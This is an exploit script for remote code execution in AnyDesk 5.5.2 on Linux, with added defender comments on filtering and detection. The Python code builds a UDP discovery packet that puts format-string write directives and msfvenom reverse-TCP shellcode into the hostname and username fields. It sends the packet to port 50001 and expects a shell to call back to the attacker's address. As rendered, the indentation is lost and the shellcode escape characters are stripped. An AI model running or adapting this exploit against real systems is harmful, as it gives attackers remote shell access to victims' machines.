# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881

#!/usr/bin/env python
import struct
import socket
import sys

# Destination of the single UDP datagram this script sends: a placeholder
# LAN address and UDP port 50001. Defender note: that port should not be
# reachable from untrusted network segments on hosts running the affected
# version named in the header.
ip, port = '192.168.x.x', 50001

# Build one discovery frame as a flat string and return it.
#
# Wire layout, in the order the statements below emit it:
#   3 fixed bytes 0x3e 0xd1 0x01
#   ad_id as big-endian u32, then a u32 zero
#   0x02 followed by one byte holding `os`
#   hn    : big-endian u32 length + raw bytes
#   user  : big-endian u32 length + raw bytes
#   a u32 zero
#   inf   : big-endian u32 length + raw bytes
#   one zero byte
#   func  : big-endian u32 length + raw bytes
#   3 fixed bytes 0x02 0xc3 0x51
#
# Parameter meanings are inferred from the names only (presumably ad_id is
# the sender's AnyDesk ID, hn a hostname, user a username) - TODO confirm
# against the walkthrough linked in the header.
#
# NOTE(review): the indentation of the body was lost on this page, and chr()
# results are concatenated with struct.pack() output, which only type-checks
# where both are the same string type; this is not Python 3 code as shown.
#
# Security relevance: every string field is attacker-chosen and copied in
# verbatim with a sender-computed length. The caller on this page puts
# printf-style conversion directives into `hn` and `user`, which suggests the
# receiving service uses those fields as a format string (inferred, not shown
# here). The defensive rule for any parser of such a frame: treat peer-supplied
# strings strictly as data (constant format, e.g. "%s"), bound the lengths, and
# build with -Wformat -Wformat-security and _FORTIFY_SOURCE=2.
def gen_discover_packet(ad_id, os, hn, user, inf, func):
# fixed 3-byte frame header
d = chr(0x3e)+chr(0xd1)+chr(0x1)
d += struct.pack('>I', ad_id)
d += struct.pack('>I', 0)
# 0x02 marker followed by the one-byte `os` value
d += chr(0x2)+chr(os)
# length-prefixed, otherwise unvalidated string fields
d += struct.pack('>I', len(hn)) + hn
d += struct.pack('>I', len(user)) + user
d += struct.pack('>I', 0)
d += struct.pack('>I', len(inf)) + inf
d += chr(0)
d += struct.pack('>I', len(func)) + func
# fixed 3-byte trailer
d += chr(0x2)+chr(0xc3)+chr(0x51)
return d

# Payload blob appended to the hostname field by the caller further down.
# Per the generator command recorded on the next line it is a Linux x64
# reverse-TCP shell produced with a bad-character list, i.e. tool-generated
# and specific to the author's lab address and port.
#
# Defender note: bytes generated this way differ per build and per callback
# address, so a byte signature on this blob is brittle. More durable signals
# are the format directives in the discovery fields and, on the host, the
# AnyDesk process spawning a shell or opening an unexpected outbound TCP
# connection. The literals as rendered on this page are not a byte-accurate
# copy and should not be used to derive indicators.
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "x00x25x26" -f python -v shellcode
shellcode = b""
shellcode += b"x48x31xc9x48x81xe9xf6xffxffxffx48"
shellcode += b"x8dx05xefxffxffxffx48xbbxcbx46x40"
shellcode += b"x6cxedxa4xe0xfbx48x31x58x27x48x2d"
shellcode += b"xf8xffxffxffxe2xf4xa1x6fx18xf5x87"
shellcode += b"xa6xbfx91xcax18x4fx69xa5x33xa8x42"
shellcode += b"xc9x46x41xd1x2dx0cx96xf8x9ax0exc9"
shellcode += b"x8ax87xb4xbax91xe1x1ex4fx69x87xa7"
shellcode += b"xbexb3x34x88x2ax4dxb5xabxe5x8ex3d"
shellcode += b"x2cx7bx34x74xecx5bxd4xa9x2fx2ex43"
shellcode += b"x9exccxe0xa8x83xcfxa7x3exbaxecx69"
shellcode += b"x1dxc4x43x40x6cxedxa4xe0xfb"

# Builds one discovery frame and sends it as a single UDP datagram to
# (ip, port); the socket is closed without reading any reply, and this script
# performs no handshake or credential exchange before sending.
#
# What a defender can take from this:
#   - Exposure: the only precondition visible here is that the target accepts
#     UDP on the configured port (50001). Filtering that port at the host
#     firewall or segment boundary removes this path; upgrading to a
#     vendor-fixed release removes the flaw.
#   - Network detection: the hostname and username arguments below carry
#     printf-style conversion directives (positional `$` forms and `n`
#     write conversions) plus non-printable bytes. Legitimate hostnames and
#     usernames contain neither, so a '%' in those fields of a discovery
#     frame is a high-signal indicator.
#   - Host detection: the final message expects a callback within seconds, so
#     look for the AnyDesk process spawning a shell or making a new outbound
#     TCP connection right after an inbound discovery datagram.
print('sending payload ...')
p = gen_discover_packet(4919, 1, 'x85xfe%1$*1$x%18x%165$ln'+shellcode, 'x85xfe%18472249x%93$ln', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')